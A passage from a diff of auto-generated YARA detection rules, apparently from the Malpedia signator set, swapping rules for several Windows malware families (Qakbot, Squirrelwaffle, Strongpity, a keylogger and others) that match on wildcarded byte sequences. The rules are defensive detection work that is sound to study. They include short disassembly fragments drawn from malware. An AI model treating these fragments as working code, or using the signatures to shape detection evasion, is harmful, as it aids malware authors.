= { 01de 31ff 31c0 fc } + $sequence_7 = { 668b044e 8b721c 01de 8b0486 } + $sequence_8 = { fc ac 84c0 7407 c1cf0d 01c7 ebf4 } + $sequence_9 = { 01da 56 e334 49 8d348a } condition: - 7 of them and filesize <204800 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Glitch_Pos_Auto : FILE +rule MALPEDIA_Win_Qakbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f95f1f9c-9245-5181-9c68-89e1dc86d5ed" + id = "241bd352-128e-5f57-a961-1a32ff520127" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glitch_pos_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qakbot_auto.yar#L1-L449" license_url = "N/A" - logic_hash = "27fcd67a00a15c3597cc82166656216e7d9a07529c9493cfeef64f5dddb0c04c" + logic_hash = "9011c5853a3a4bce7115bdec7dfc8cc7a3dbd683d5e3bd577fb86bb5ca62af81" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147050,34 +149873,77 @@ rule MALPEDIA_Win_Glitch_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83a5d8feffff00 8b45b8 898518ffffff 8d45d0 50 8b8518ffffff } - $sequence_1 = { 8b4508 8b00 ff7508 ff9028070000 668b45d4 662d0100 } - $sequence_2 = { ffb504ffffff e8???????? 89855cfeffff eb07 83a55cfeffff00 8d8d5cffffff e8???????? } - $sequence_3 = { e8???????? 8d8520ffffff 50 8d8530ffffff 50 8d45dc 50 } - $sequence_4 = { 68???????? 68???????? e8???????? c78568feffff2cc34600 eb0a c78568feffff2cc34600 8b8568feffff } - $sequence_5 = { eb07 83a5fcfdffff00 8d45c4 50 8d45cc 50 6a02 } - $sequence_6 = { 8b4d10 660301 0f8058040000 668945ec 8b4508 8b00 } - $sequence_7 = { 83c40c 68???????? 6a00 6a06 8b4508 } - $sequence_8 = { 8d45b4 50 8d45b8 50 6a03 e8???????? } - $sequence_9 = { 8bec 83ec0c 68???????? 64a100000000 50 64892500000000 b8bc000000 } + $sequence_0 = { c9 c3 55 8bec 81ecc4090000 } + $sequence_1 = { 33c0 7402 ebfa e8???????? } + $sequence_2 = { 7402 ebfa 33c0 7402 } + $sequence_3 = { 7402 ebfa eb06 33c0 } + $sequence_4 = { e8???????? 33c9 85c0 0f9fc1 41 } + $sequence_5 = { 50 e8???????? 8b06 47 59 } + $sequence_6 = { 8d45fc 6aff 50 e8???????? } + $sequence_7 = { 59 59 33c0 7402 } + $sequence_8 = { e8???????? 59 59 6afb e9???????? } + $sequence_9 = { 740d 8d45fc 6a00 50 } + $sequence_10 = { 50 8d8534f6ffff 6a00 50 e8???????? } + $sequence_11 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? } + $sequence_12 = { 33c0 e9???????? 33c0 7402 } + $sequence_13 = { 7402 ebfa e9???????? 6a00 } + $sequence_14 = { 8975f8 8975f0 8975f4 e8???????? } + $sequence_15 = { eb0b c644301c00 ff465c 8b465c 83f840 7cf0 } + $sequence_16 = { 7cef eb10 c644301c00 ff465c 8b465c 83f838 } + $sequence_17 = { e8???????? 83c410 33c0 7402 } + $sequence_18 = { 85c0 750a 33c0 7402 } + $sequence_19 = { c644061c00 ff465c 837e5c38 7cef eb10 c644301c00 } + $sequence_20 = { 7507 c7466401000000 83f840 7507 } + $sequence_21 = { 837dfc00 750b 33c0 7402 } + $sequence_22 = { e8???????? e8???????? 33c0 7402 } + $sequence_23 = { 833d????????00 7508 33c0 7402 } + $sequence_24 = { c7466001000000 33c0 40 5e } + $sequence_25 = { 7402 ebfa 837d1000 7408 } + $sequence_26 = { 80ea80 8855f0 e8???????? 0fb64df7 } + $sequence_27 = { 50 8d45d8 50 8d45d4 50 8d45ec } + $sequence_28 = { 56 e8???????? 8b45fc 83c40c 40 } + $sequence_29 = { 6a00 6800600900 6a00 ff15???????? } + $sequence_30 = { 50 ff5508 8bf0 59 } + $sequence_31 = { 6a00 58 0f95c0 40 50 } + $sequence_32 = { 57 ff15???????? 33c0 85f6 0f94c0 } + $sequence_33 = { 750c 57 ff15???????? 6afe 58 } + $sequence_34 = { c3 33c9 3d80000000 0f94c1 } + $sequence_35 = { 6a02 ff15???????? 8bf8 83c8ff } + $sequence_36 = { 50 e8???????? 6a40 8d4590 } + $sequence_37 = { 8d85e4fcffff 50 8d85e4fdffff 50 } + $sequence_38 = { 56 e8???????? 83c40c 8d4514 50 } + $sequence_39 = { e8???????? 6a00 8d45d4 50 68???????? } + $sequence_40 = { 5d c3 33c9 66890c46 } + $sequence_41 = { 8b4a04 83c204 03f0 85c9 75e1 } + $sequence_42 = { 01f1 898424a8000000 899424ac000000 8d8424b4000000 89c2 8db424c4000000 } + $sequence_43 = { 8a442417 8b4c2410 0485 88440c66 89ca 83c201 } + $sequence_44 = { ffd3 85ff 741b 6808020000 6a00 } + $sequence_45 = { 88442401 894c245c 0f847afdffff e9???????? } + $sequence_46 = { 89442410 884c2417 eb94 55 89e5 31c0 } + $sequence_47 = { 8945fc 8b4518 53 8b5d10 56 8945c4 } + $sequence_48 = { 8b742420 81c638a1e7c3 39f0 89442410 894c240c 89542408 7408 } + $sequence_49 = { 8b74242c bb3c13b648 f7e3 69f63c13b648 01f2 89442428 8954242c } + $sequence_50 = { 8b4c2444 ffd1 83ec08 b901000000 ba66000000 31ff 89c3 } + $sequence_51 = { 89e0 89580c bb04000000 895808 8b5c246c 895804 8b9c2480000000 } + $sequence_52 = { 8bf0 83c40c 85f6 0f84f8000000 a1???????? } condition: - 7 of them and filesize <1024000 + 7 of them and filesize <4883456 } -rule MALPEDIA_Win_Qtbot_Auto : FILE +rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ec8aa97a-290d-593c-aa5f-6c160f3c38cf" + id = "67d18a0f-cebe-56e6-8b79-40dff03f1fb3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qtbot_auto.yar#L1-L168" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.squirrelwaffle_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "2c7689c956559567f13a9ec6cae95c5c067935d56f8491bff1983eb40f5f2838" - score = 60 - quality = 25 + logic_hash = "2fb7fd7c7f2885b81fdacc79e3b0b0578babd5d7d5854f31f47508825bacd6eb" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147089,38 +149955,32 @@ rule MALPEDIA_Win_Qtbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89450c 8d4301 0fb6d8 8a941dfcfeffff 0fb6c2 } - $sequence_1 = { 75e9 5b 5d c20400 } - $sequence_2 = { 25ffffff00 42 8a1a 84db } - $sequence_3 = { 8b049a 03c6 50 e8???????? } - $sequence_4 = { 33c0 53 8a1a 6bc80d 0fb6c3 83c0d0 } - $sequence_5 = { 03d6 8b481c 8b4018 03ce } - $sequence_6 = { 40 89450c 83ef01 75b1 8b4510 5f 5e } - $sequence_7 = { 85ff 7455 8b4510 89450c } - $sequence_8 = { 894dfc eb0e 8b14957c300010 49 0fafd1 0155fc } - $sequence_9 = { 8bd8 8d7e08 7504 8b2f eb02 } - $sequence_10 = { 0fb6805a210010 ff2485f6200010 8b8614080000 3b45f4 7e03 8945f4 8365fc00 } - $sequence_11 = { 6a00 ff15???????? 833e05 7521 6a10 6a40 ff15???????? } - $sequence_12 = { 8db720080000 833e00 751e 837efcff 7518 8b46f8 8b04855c300010 } - $sequence_13 = { 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c300010 } - $sequence_14 = { 33c0 8b7df4 8b0c855c300010 c1e705 33d2 03fe } - $sequence_15 = { e8???????? 59 837e04ff 8bd8 8d7e08 } + $sequence_0 = { ffd6 85c0 0f85d9000000 8b458c } + $sequence_1 = { 0f431d???????? 8a00 85c9 7416 51 } + $sequence_2 = { 83c40c 8b36 ba???????? 85f6 0f853cffffff 8b7d88 } + $sequence_3 = { 85c0 0f8453020000 8b4a14 48 8945f0 8bc2 } + $sequence_4 = { 8b7310 2bc6 8975f8 57 3bc2 0f8214010000 8d0416 } + $sequence_5 = { b803000000 0f438d10fefeff ba???????? 83fe03 } + $sequence_6 = { 0f1185f8fdfeff f30f7e4710 660fd68508fefeff c7471000000000 c747140f000000 } + $sequence_7 = { 8db5f8fbffff 8d34c6 837e1410 8bc6 7202 } + $sequence_8 = { 897714 eb26 8b0d???????? 0f57c0 } + $sequence_9 = { c645cc00 8d4dd8 ff75cc 6a08 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Uacme_Auto : FILE +rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f5c3a5f2-a252-5543-b1be-134e5f419833" + id = "60cc7c89-f223-5f05-b50e-ef8d73401362" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.uacme_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_greencat_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "9cc750a1f13cae79bcf2cd2e379aedeb4cbdf45f9813c77d239c596ff07109f6" + logic_hash = "e9fd4938930988d9b35f1bca39290f31fad2f360914fa390eec34fabf9934b56" score = 75 quality = 75 tags = "FILE" @@ -147134,34 +149994,34 @@ rule MALPEDIA_Win_Uacme_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ba???????? e8???????? 8d8df0fbffff e8???????? 8bf8 85ff 741b } - $sequence_1 = { ff9620060000 33c0 5e 8be5 5d c20400 } - $sequence_2 = { eb23 8b4d08 e8???????? 03c0 } - $sequence_3 = { 8d45d8 50 6804900000 56 ff15???????? 6808700000 56 } - $sequence_4 = { ba???????? 8d8940040000 e8???????? 8b45fc ff7010 ffd6 } - $sequence_5 = { 8bd8 85db 74d3 8b5508 8bcb e8???????? } - $sequence_6 = { 668974242e ff15???????? 85c0 0f88c9040000 ff15???????? b940040000 } - $sequence_7 = { e8???????? 8bce 8d85e0fbffff 8818 40 83e901 } - $sequence_8 = { b9???????? e8???????? 6683bdf0fbffff00 8bf0 740d 8d85f0fbffff 50 } - $sequence_9 = { 8d85f0fbffff 50 8d85e0f7ffff 50 e8???????? 8bd8 } + $sequence_0 = { 57 50 e8???????? 59 8bd8 59 eb03 } + $sequence_1 = { 59 59 e9???????? ff35???????? ff15???????? 3bc6 } + $sequence_2 = { 33f6 895df4 8d450c 50 ff35???????? ff15???????? 817d0c03010000 } + $sequence_3 = { 395ddc 752d 391d???????? 7525 3bf3 7521 } + $sequence_4 = { e8???????? 83c418 53 6a02 } + $sequence_5 = { 8d85fcfeffff 33ff 6804010000 50 } + $sequence_6 = { 50 53 ff15???????? 33c9 8945f0 } + $sequence_7 = { 8bf0 395ddc 752d 391d???????? 7525 3bf3 7521 } + $sequence_8 = { ff75fc ff15???????? 83c428 53 6880000000 } + $sequence_9 = { 0fbe4007 83e830 8945f8 8d85f8fdffff 50 } condition: - 7 of them and filesize <565248 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Remexi_Auto : FILE +rule MALPEDIA_Win_Laturo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "687f133c-aa4c-5c82-a16b-c166cd521a0e" + id = "a099051d-06cc-5747-80aa-ce74001854da" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remexi_auto.yar#L1-L209" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.laturo_auto.yar#L1-L179" license_url = "N/A" - logic_hash = "05a94cf7e4fffe2d3333c852ee9c9ff577487ed8e4c35b0a2c90ccf7655ac3b0" + logic_hash = "5c5686ac498628ddacc2bb584f3ee57bf281fd85acd0c0e6dfbd3f9934f8bef4" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147173,45 +150033,40 @@ rule MALPEDIA_Win_Remexi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 c706ffffffff e8???????? 83c404 } - $sequence_1 = { 53 50 ff15???????? 3dffffff00 } - $sequence_2 = { ff15???????? 8bf0 85f6 7513 8b45d8 } - $sequence_3 = { 68???????? 50 ff15???????? 8b0d???????? 8b35???????? 890d???????? 68???????? } - $sequence_4 = { 8945e0 8945e4 8945e8 b802000000 } - $sequence_5 = { ff15???????? 6a10 8d4ddc 8bf0 51 56 ff15???????? } - $sequence_6 = { 8b95d4feffff 52 6a00 68ffff1f00 ffd7 } - $sequence_7 = { e8???????? 83ec1c 8bcc 89642430 6aff 53 } - $sequence_8 = { 52 56 50 e8???????? 8bf0 eb02 } - $sequence_9 = { 57 e8???????? 6a01 6a00 6a00 ff15???????? } - $sequence_10 = { 33c0 5f c3 56 ff15???????? 57 8b3d???????? } - $sequence_11 = { 8b45d8 8b4818 8b5104 50 8955e0 } - $sequence_12 = { 890d???????? 68???????? 41 50 a3???????? } - $sequence_13 = { 488bf9 33d2 33c9 e8???????? 488d0d74e90100 4885c0 480f44c1 } - $sequence_14 = { 488d15fe730200 488d4c2450 e8???????? 90 41b902000000 } - $sequence_15 = { 0f8333010000 488d4550 483bf0 0f8726010000 } - $sequence_16 = { 488b0b e8???????? 48c743180f000000 48c7431000000000 c60300 8bc7 488b4c2438 } - $sequence_17 = { 4883ec40 48c7442428feffffff 48895c2460 4889742468 488b05???????? } - $sequence_18 = { 488d0527dd0100 488981b8000000 4883a17004000000 b90d000000 } - $sequence_19 = { 488d4c2470 e8???????? 85c0 750a b902020208 } - $sequence_20 = { b902010209 e8???????? 90 48837b1810 } + $sequence_0 = { 486bc038 488b0d???????? 8b440120 c1e01e c1f81f 3b442450 741a } + $sequence_1 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2dea040100 } + $sequence_2 = { 884814 0fb644243c 83f805 7511 0fb6442405 83e001 85c0 } + $sequence_3 = { 48837c242000 7432 488b442430 4839442420 720c } + $sequence_4 = { 488d0d13800100 33c0 8b542420 f00fb111 85c0 742c 48837c242820 } + $sequence_5 = { 4c8d34c0 49c1fc06 4a8b84e1f0a50100 4a8b44f028 488945bf } + $sequence_6 = { 488b09 448b0481 33d2 b95a000000 ff15???????? } + $sequence_7 = { 4883f9fd 7706 ff15???????? 488364243000 488d0dfc7b0000 8364242800 41b803000000 } + $sequence_8 = { 8bc2 8955e4 c1e802 8bf2 8b55f0 83e603 } + $sequence_9 = { b803000000 50 68???????? ff763c e8???????? 83c40c 85c0 } + $sequence_10 = { 7510 46 83c028 3bf2 } + $sequence_11 = { 8a4dfe 84c0 8a45ff 7909 } + $sequence_12 = { 53 ff15???????? 50 ff15???????? 834f1406 8b15???????? 8b4df4 } + $sequence_13 = { 6bd730 8b0c8d30430110 c644112800 85f6 740c 56 e8???????? } + $sequence_14 = { 8945fc ff15???????? 85c0 7460 c603e9 8b4704 2bc3 } + $sequence_15 = { 83feff 0f8432010000 57 6a01 83caff 8d4de8 } condition: - 7 of them and filesize <614400 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Cmstar_Auto : FILE +rule MALPEDIA_Win_Strongpity_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aaad9b46-b601-594d-9a0b-7ba351f67235" + id = "74f27818-19f0-5cf0-92fb-64e00785ec08" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cmstar_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strongpity_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "c5a1f8b6b909717cbba254781a42955dfe756a8fae37e256ff72ffa4cd43d897" - score = 75 - quality = 75 + logic_hash = "61a3d3556929a6d92379ea8e74c4d3e507b020fc18a8d58904a2026c1434bfed" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147223,38 +150078,38 @@ rule MALPEDIA_Win_Cmstar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 836dfc10 ff75fc 8945e0 8b45dc 83c310 } - $sequence_1 = { 8b4dec c1e802 6a04 52 8d0481 50 e8???????? } - $sequence_2 = { ff75e0 ff30 e8???????? 8b4df8 } - $sequence_3 = { ff15???????? 8bc6 e9???????? 6a10 8d45d0 53 } - $sequence_4 = { ff15???????? 6a04 e8???????? be00040000 } - $sequence_5 = { 56 bb04010000 57 53 } - $sequence_6 = { ff15???????? 6a03 58 5f 5e 5b c9 } - $sequence_7 = { 85c0 7504 6a03 eb0d 803b4d } - $sequence_8 = { 81ce00ffffff 46 8a1c06 88542418 881c01 8b5c2418 } - $sequence_9 = { 8b2d???????? 8b44241c 8bc8 48 85c9 8944241c 7e65 } - $sequence_10 = { 5d 741c 8a41ff 3ac3 740b 3cff } - $sequence_11 = { 7505 a1???????? 50 ff15???????? eb17 } - $sequence_12 = { 8bf0 8d5601 52 e8???????? 83c404 8bf8 8d442414 } - $sequence_13 = { e9???????? 55 83f801 57 7532 } - $sequence_14 = { 50 ff15???????? 83f8ff 89442420 7507 33f6 e9???????? } - $sequence_15 = { 8b5c2408 55 8b6c2414 56 57 8b7c2418 8bcb } + $sequence_0 = { 50 33c0 d1f9 50 51 53 } + $sequence_1 = { 75f8 ff75d0 68???????? ff36 e8???????? } + $sequence_2 = { 41 83ea01 75f7 50 e8???????? 59 } + $sequence_3 = { e8???????? 8b4608 83c418 6a2f 59 } + $sequence_4 = { 8945f8 f7d8 56 57 } + $sequence_5 = { 33db c745f804000000 53 ff7710 895df4 ff770c } + $sequence_6 = { ba???????? f3a5 8bf2 668b02 83c202 } + $sequence_7 = { 83e801 7408 6a02 58 884612 } + $sequence_8 = { 0107 83be8800000002 8b07 0f85ad000000 83f814 } + $sequence_9 = { 012e 885c240a e9???????? 84db 0f8434020000 } + $sequence_10 = { 5f 8d4503 5d 5b 8b4c2428 } + $sequence_11 = { 7417 48 7545 39812c020000 7433 8b8124020000 } + $sequence_12 = { 5f 8b4c2408 5e 5b } + $sequence_13 = { 5f 8d4502 5d 5e 5b 8b4c2468 } + $sequence_14 = { 012e 885c240a ebc3 80fb5d 7520 837c240c00 0f85fe020000 } + $sequence_15 = { 5f 8bc3 5b c3 8d4638 50 e8???????? } condition: - 7 of them and filesize <4268032 + 7 of them and filesize <999424 } -rule MALPEDIA_Win_Jasus_Auto : FILE +rule MALPEDIA_Win_Poohmilk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f0f57156-3d71-51a0-8417-ea38ed1ea26d" + id = "4a533432-ed1d-58b3-b34c-6e80b5d4a8fb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jasus_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poohmilk_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "8597018770d02606e940d401ffb7afc270f8035f09e3cd93e76c94000290c2f1" + logic_hash = "ecd179731e16caedb85d9961e87834bc792941e3499df96bf9bfcadeaf395c81" score = 75 quality = 75 tags = "FILE" @@ -147268,32 +150123,32 @@ rule MALPEDIA_Win_Jasus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 51 6689956cffffff ffd3 83c40c 833d????????00 } - $sequence_1 = { 8955f8 8955e8 8955ec c745f0ffffffff 84c0 7410 8d642400 } - $sequence_2 = { 84c0 7543 8b45fc 85c0 745a 68???????? } - $sequence_3 = { 39580c 0f828d000000 0fb71437 8b4e1a 33c0 89442414 89442418 } - $sequence_4 = { 8945f0 894df8 b801000000 837dec00 745d 85c0 7559 } - $sequence_5 = { 8b1481 40 89560c 8906 8b5e0c 895e14 8a03 } - $sequence_6 = { 47 897e14 897e70 c686c800000043 c6864b01000043 c74668d0f24100 6a0d } - $sequence_7 = { 894de8 8945e4 c745ec00c94100 c745f001010000 c745f41e010000 c745f80f000000 } - $sequence_8 = { 8bc6 c1f805 8d1485809d4300 8b0a } - $sequence_9 = { e8???????? 0fb71d???????? 8945fc 0fb705???????? 56 68???????? e8???????? } + $sequence_0 = { d3eb 2bf1 8b0c850c344100 014c822c 40 89856cffffff e9???????? } + $sequence_1 = { 898560f3ffff c705????????00000000 ffd7 8d8dccf7ffff 51 } + $sequence_2 = { 0301 eb02 33c0 8b4d08 85c9 7406 } + $sequence_3 = { 898d74d2ffff 898d78d2ffff 3bd9 7417 3bc1 7513 33c0 } + $sequence_4 = { 83ffff 0f8410010000 53 8b1d???????? 6a02 } + $sequence_5 = { 8bd6 e8???????? 33c9 3b85a4fdffff 5f } + $sequence_6 = { 85c0 0f8499000000 68???????? 8d842424020000 50 ffd6 8b4c2410 } + $sequence_7 = { 23fb d3eb 0fbe8a10344100 03f9 } + $sequence_8 = { 5e c21000 8bff 55 8bec 8b4d0c } + $sequence_9 = { 8b4710 8b4e28 53 52 8b5624 } condition: - 7 of them and filesize <507904 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Navrat_Auto : FILE +rule MALPEDIA_Win_Sys10_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "267e4534-59a3-5746-9f05-524cfafc2ef1" + id = "01030a4d-1840-51b2-a9d0-6bbc4385fa1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.navrat_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sys10_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "d02406512a8ed4f24033286c28dfca048100e2bb166bb80aa3e9acab2e4b74d3" + logic_hash = "6943a43537b8ee069df094c74ea397f99150d4b78d4cfd8ed6ddb44f86656e07" score = 75 quality = 75 tags = "FILE" @@ -147307,32 +150162,32 @@ rule MALPEDIA_Win_Navrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fbec0 83e847 c3 8d48d0 80f909 } - $sequence_1 = { 56 68???????? 50 8d85f0feffff 8bf1 50 } - $sequence_2 = { f7de 1bf6 f7de 56 68???????? } - $sequence_3 = { 8bf0 f7de 1bf6 f7de 56 } - $sequence_4 = { 0fbec0 83e847 c3 8d48d0 80f909 7707 } - $sequence_5 = { 7707 0fbec0 83c004 c3 3c2b 7503 } - $sequence_6 = { c3 3c2f 0f95c0 fec8 2440 fec8 } - $sequence_7 = { 85f6 7407 8b7608 83461c02 } - $sequence_8 = { c745dc726f736f c745e066745c57 c745e4696e646f c745e877735c43 c745ec75727265 c745f06e745665 } - $sequence_9 = { 51 56 50 57 a3???????? ff15???????? 57 } + $sequence_0 = { 6a03 68???????? 68???????? 51 52 50 ff15???????? } + $sequence_1 = { 837e04ff 740b 8b16 52 e8???????? 83c404 } + $sequence_2 = { 8b4e0c 51 ff15???????? 8b5608 6aff 52 ff15???????? } + $sequence_3 = { 56 e8???????? 83c404 85c0 74c6 8b4c2410 896e10 } + $sequence_4 = { 6810270000 ff15???????? 33c0 59 } + $sequence_5 = { 837e04ff 740b 8b16 52 } + $sequence_6 = { 56 89442414 e8???????? 83c404 85c0 7541 } + $sequence_7 = { 52 6a05 50 ffd6 8b5308 } + $sequence_8 = { 8d4c2413 51 6800400000 52 50 e8???????? } + $sequence_9 = { 8b13 52 ffd7 8b4304 50 ffd7 8b4b08 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Phandoor_Auto : FILE +rule MALPEDIA_Win_Decaf_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1f3ac76b-bd09-5712-8c06-9b7787ce6d6a" + id = "871b7c64-9bb1-5d5d-b760-fe69f683da0a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phandoor_auto.yar#L1-L152" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.decaf" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.decaf_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "bcca1bd5fcc5f942c80e8300ebd91840d93d57fc52bf130291de8a118788c527" + logic_hash = "2f8679cf6195e76585744c378fca956597817fdb2b26b865768f35c66fced6eb" score = 75 quality = 75 tags = "FILE" @@ -147346,37 +150201,32 @@ rule MALPEDIA_Win_Phandoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8482000000 833d????????00 7479 833d????????00 7470 833d????????00 } - $sequence_1 = { 833d????????00 0f8452010000 833d????????00 0f8445010000 833d????????00 } - $sequence_2 = { 83c40c 83c302 3bbe90010000 72d7 } - $sequence_3 = { 83c404 8d55fc 8bf0 52 56 } - $sequence_4 = { 0f84c7010000 833d????????00 0f84ba010000 833d????????00 0f84ad010000 833d????????00 } - $sequence_5 = { 50 8bf9 c645f400 c745f500000000 e8???????? } - $sequence_6 = { 32d3 32d0 8b45f4 81e1fe010000 c1e018 0b45f8 } - $sequence_7 = { a3???????? a3???????? a3???????? a3???????? 898de8feffff } - $sequence_8 = { 83c404 893e 8b4604 3bc7 740c } - $sequence_9 = { 6a01 51 52 8b5508 } - $sequence_10 = { 668901 5e c3 33d2 } - $sequence_11 = { 33c0 3b35???????? 7327 57 } - $sequence_12 = { 56 8b35???????? 57 68???????? 50 c705????????03000000 } - $sequence_13 = { 6a01 53 51 8bc8 } - $sequence_14 = { 56 8b7308 85f6 7420 } + $sequence_0 = { e8???????? e8???????? 48898424a8180000 48899c2440060000 488b0d???????? 48898c2420230000 488d0543040c00 } + $sequence_1 = { 4c8b442470 4889c7 4889ce 488b442440 c7041fcacccec6 b905000000 e9???????? } + $sequence_2 = { e9???????? 4c8d4302 4c39c6 7337 4c89442468 488d05d8a30300 4889d9 } + $sequence_3 = { c3 488d0582761b00 bb10000000 e8???????? 4889f8 b900200000 e8???????? } + $sequence_4 = { e8???????? 488b8c24b8040000 48894808 833d????????00 7514 488b8c2410160000 488908 } + $sequence_5 = { eb1c 4889c7 488b8c24f0120000 e8???????? 488d3d53871f00 e8???????? e8???????? } + $sequence_6 = { e8???????? 488d05d4ad1300 488d1d95d21900 e8???????? 4d8d6830 4c89d6 4d89ea } + $sequence_7 = { e9???????? 90 66c744244f1c14 0fb654244f 88542445 440fb6442450 4488442444 } + $sequence_8 = { c6041f95 31c9 e9???????? 4983f809 754d 4c8d4301 4c39c6 } + $sequence_9 = { e9???????? 48895c2428 4889442430 488d0d664c1d00 bf0d000000 e8???????? 4885c0 } condition: - 7 of them and filesize <2124800 + 7 of them and filesize <7193600 } -rule MALPEDIA_Win_Expiro_Auto : FILE +rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9bf3ea51-503d-5f40-a69a-188866df3f7b" + id = "888501fd-ce54-593e-a428-69ec62ec3120" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro" - source_url = 